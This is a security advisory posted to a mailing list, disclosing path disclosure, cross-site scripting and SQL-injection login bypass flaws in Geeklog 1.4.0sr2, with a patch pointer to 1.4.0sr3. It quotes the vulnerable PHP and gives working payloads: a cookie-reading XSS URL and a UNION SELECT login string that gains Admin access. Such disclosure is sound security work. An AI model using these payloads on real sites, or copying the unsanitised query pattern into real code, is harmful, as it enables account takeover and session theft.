[KAPDA::#45] - geeklog multiple vulnerabilities

[alireza hassani <trueend5@xxxxxxxxx>]

KAPDA New advisory

Vendor: http://www.geeklog.net
Bugs: Path Disclosure, XSS, SQL Injection
(Authentication bypass) 

Vulnerable Version: geeklog-1.4.0sr2(prior versions
also may be affected)
Exploitation: Remote with browser

Description:
--------------------
geeklog is a freely available  PHP-based web content
management system that uses a MySQL database.
Vulnerabilities:
--------------------
-->>Path Disclosure<<--
Reason: direct access to special files that generates
php error with installation path information.
Several files are vulnerable in this case.
Example:
http://example.com/geeklog/layout/professional/functions.php
http://example.com/geeklog/getimage.php?mode=show&image=dd

-->>XSS<<--
Reason: the script doesn't properly validate user
supplied input in getimage.php that result in xss
vulnerability

Example:
http://example.com/geeklog/getimage.php?mode=show&image=./<IMG%20SRC=JaVaScRiPt:alert(document.cookie)>


Code Snippets:
/getimage.php line#100-103

$display = COM_errorLog('File, ' .
$downloader->getPath() . $image . ', was not found in
getimage.php');

    if ($mode == 'show') {
        echo COM_siteHeader ('menu') . $display .
COM_siteFooter ();

-->>SQL Injection (Authentication bypass)<<--
Reason: again the script doesn't properly validate
user supplied input in /admin/auth.inc.php that may
result in Authentication bypass using sql injection to
gain admin privileges.

Code Snippets:
/admin/auth.inc.php line#44-45

if (!empty ($_POST['loginname']) && !empty
($_POST['passwd'])) {
    $status = SEC_authenticate ($_POST['loginname'],
$_POST['passwd'], $uid);


../system/lib-security.php line#697-732

function SEC_authenticate($username, $password, &$uid)
{
    global $_TABLES, $LANG01, $_CONF;

    $result = DB_query( "SELECT status, passwd, email,
uid FROM {$_TABLES['users']} WHERE
username='$username' AND ((remoteservice is null) or
(remoteservice = ''))" );
    $tmp = mysql_errno();
    $nrows = DB_numRows( $result );

    if(( $tmp == 0 ) && ( $nrows == 1 ))
    {
        $U = DB_fetchArray( $result );
        $uid = $U['uid'];
        if ($U['status'] == USER_ACCOUNT_DISABLED)
        {
            return USER_ACCOUNT_DISABLED; // banned,
jump to here to save an md5 calc.
        } elseif ($U['passwd'] != md5( $password )) {
            return -1; // failed login
        } elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_APPROVAL) {
            //awaiting approval, jump to msg.
            echo COM_refresh($_CONF['site_url'] .
'/users.php?msg=70');
            exit;
        } elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_ACTIVATION) {
            // Awaiting user activation, activate:
           
DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$username);
            return USER_ACCOUNT_ACTIVE;
        } else {
            return $U['status']; // just return their
status
        }
    }
    else
    {
        $tmp = $LANG01[32] . ": '" . $username . "'";
        COM_errorLog( $tmp, 1 );
        return -1;
    }
}

as you see there is no input validation here so when
magic_quotes_gpc=off you can bypass login
Authentication.
 
Example:
/admin/moderation.php       POST data:
loginname:
me' union select
3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from
gl_users where username='Admin
passwd:
22222

Solution:
--------------------
Version geeklog-1.4.0sr3 is available now.
http://www.geeklog.net/article.php/geeklog-1.4.0sr3

Original Advisory:
--------------------
http://kapda.ir/advisory-336.html

Credit:
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com